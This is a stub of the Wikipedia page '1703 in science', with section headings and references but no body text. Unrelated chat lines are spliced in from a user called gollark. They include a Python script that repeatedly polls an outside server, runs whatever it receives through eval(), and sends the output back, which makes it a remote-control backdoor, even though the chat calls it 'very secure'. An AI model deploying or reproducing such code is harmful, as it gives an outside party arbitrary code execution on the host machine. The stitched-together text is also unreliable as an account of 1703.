1703 in science

The year 1703 in science and technology involved some significant events.

List of years in science (table)

Biology

Chemistry

Mathematics

Meteorology

Technology

Appointments

Births

Deaths

gollark: Probably not?
gollark: Plus, unlike the old version, it only uses builtin python modules.
gollark: It's very secure.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```Using the new SPUDNET-HTTP API.
gollark: Make it continuously ping osmarks.net so you know what it's up to.

References

  1. The Encyclopædia Britannica: a Dictionary of Arts, Sciences, Literature and General Information, Volume XI, Franciscans to Gibbons 11th ed. New York: The Encyclopædia Britannica Company (1910). p. 272. Retrieved on 2007-09-25.
  2. Mason, Stephen F. (1962). "Chapter 26". A History of the Sciences (revised ed.). New York: Collier Books.
  3. Leibniz G. "Explication de l'Arithmétique Binaire". Memoires de l'Academie Royale des Sciences. Repr. in Gerhardt, C., ed. (1879), Die Mathematische Schriften, Berlin, 7:223. English translation as "Explanation of Binary Arithmetic" at Leibniz Translations, retrieved on 2013-12-24.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.